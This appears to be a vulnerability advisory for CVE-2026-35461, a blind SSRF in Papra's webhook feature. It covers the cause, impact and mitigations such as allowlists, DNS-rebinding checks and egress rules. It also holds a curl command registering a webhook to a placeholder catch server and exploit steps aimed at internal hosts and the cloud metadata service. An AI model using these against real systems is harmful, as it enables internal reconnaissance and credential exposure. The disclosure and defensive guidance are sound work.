Papra Webhook System, Server-Side Request Forgery (SSRF), CVE-2026-35461 (Medium) -DC-Jun2026-321


The vulnerability in Papra’s webhook system, tracked as CVE-2026-35461, is a Blind Server-Side Request Forgery (SSRF) caused by missing validation of user-supplied webhook URLs. Before version 26.4.0, any authenticated user could register an arbitrary URL as a webhook endpoint, and the application performed no check on where that URL pointed. When a document event occurs, the Papra server makes an outbound HTTP POST to the registered URL, so it will send that request to any destination, including private or reserved addresses.
This is dangerous because an attacker can point the webhook at an internal service, such as `http://localhost:8080/admin`, `http://10.0.0.1/secret`, or, in a cloud environment, the instance metadata service at `http://169.254.169.254/latest/meta-data/`. The server, which sits inside the network, then acts as a proxy and sends the request to that internal address. The response is not returned to the attacker (hence "Blind" SSRF), but the request still has value: it can trigger side effects on internal services that accept unauthenticated POSTs, and differences in timing or error handling can reveal which internal hosts and ports exist. Because the request originates from the application server, it bypasses perimeter firewall rules and reaches resources that were meant to be isolated from the public internet.
The attack vector is straightforward: the attacker needs only an authenticated account on the platform. Using the standard API or UI, they create a new webhook whose URL is an internal target. From then on, every document creation or update event makes the server send a request to that address. The attacker cannot read the response, but can infer information from server-side behaviour (for example a timeout versus a connection refused) or cause state changes if the internal service accepts unauthenticated POST requests. The fix, shipped in version 26.4.0, adds a validation step that checks the webhook URL against a blocklist of private and reserved addresses (localhost, link-local and RFC 1918 ranges) so that such requests are never made.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: `Papra`
Version: `< 26.4.0`
Vulnerability: `Blind SSRF`
Severity: `Medium`
Date: `2026-04-07`
<h2 style="color: blue;">Prediction: Immediate</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">CVE Query:</h2>

# Check the version of a running Papra instance via the API
curl -s https://your-papra-instance.com/api/health | jq '.version'
# Search-engine query for exposed deployments (theoretical):
"Papra" "webhook" "version"

<h2 style="color: blue;">Confirmation Payload:</h2>

# Register a webhook pointing at a listener you control (e.g., netcat on your own host).
# If the listener receives a POST after the trigger, the server makes outbound requests
# to whatever URL it is given; repeat with an internal address to confirm the SSRF.
curl -X POST https://your-papra-instance.com/api/organizations/ORG_ID/webhooks \
-H "Authorization: Bearer YOUR_API_KEY" \
-H "Content-Type: application/json" \
-d '{
"name": "SSRF Test",
"url": "http://your-catch-server.com:8080/test",
"events": ["document:created"]
}'
# Then trigger the webhook by uploading a document and watch the listener.

<h2 style="color: blue;">Exploit:</h2>
<h2 style="color: blue;">The exploitation process is as follows:</h2>
1. Identify Target: Find a Papra instance running a version earlier than 26.4.0.
2. Authenticate: Obtain or create a user account on the platform.
3. Craft Malicious Webhook: Using the API or UI, register a new webhook. Instead of a legitimate external endpoint, provide a URL that points to a private IP or internal hostname (e.g., `http://192.168.1.1/config`, `http://localhost:8080`, `http://169.254.169.254/latest/user-data`).
4. Trigger Request: Cause an event that fires the webhook. The simplest is to create a new document in Papra, which makes the server POST to the registered URL.
5. Observe Outcome: The attacker does not see the response, but can determine whether the request was made by:
   Monitoring logs on a listener they control for connection attempts (this confirms that the server makes outbound requests at all).
   Observing differences in the server's behaviour, such as a delay or a specific error message that distinguishes a closed port from an open one.
   If the cloud metadata service is reachable, the server can be made to send it a request (for example, one that would return temporary credentials), though the response is not returned to the attacker because the SSRF is blind.

Protection:

The primary protection is to upgrade to Papra version 26.4.0 or later, which adds SSRF protection for webhook URLs. If an immediate upgrade is not possible, enforce a strict allowlist of approved callback domains, or at minimum validate every webhook URL and reject any whose host is localhost, a link-local address, or an RFC 1918 address. A string match on the URL is not sufficient on its own: resolve the hostname and check every returned address, reject alternate spellings of the same address (IPv6 literals, IPv4-mapped IPv6, decimal or hexadecimal IPv4), repeat the check at delivery time so that a DNS record changed after registration (DNS rebinding) is caught, and do not follow redirects to unchecked destinations. As a temporary emergency measure, disable the ability of non-administrative users to register or modify webhooks. For defence in depth, add network-level controls: route the application server's outbound HTTP through a forward proxy or egress rules that deny access to internal and metadata IP ranges.

Impact

A successful exploit allows an authenticated attacker to use the Papra server as a pivot point to:
Probe Internal Network: Map internal services by registering webhooks for common ports (e.g., 22, 80, 443, 3306) and inferring from delivery timing or error behaviour which ones accept connections.
Access Cloud Metadata: In cloud environments (AWS, GCP, Azure), reach the instance metadata service (169.254.169.254), which holds sensitive data such as IAM role names, user-data scripts, or temporary credentials; because the SSRF is blind, that data is not returned to the attacker directly.
Bypass Firewalls: Reach internal services that are not intended to be exposed to the internet, exploiting the trust they place in requests from inside the network.
Cause State Changes: If an internal service accepts unauthenticated POST requests, trigger actions on it, such as creating a new admin user, deleting data, or restarting services.

Sources:

Reported By: github.com
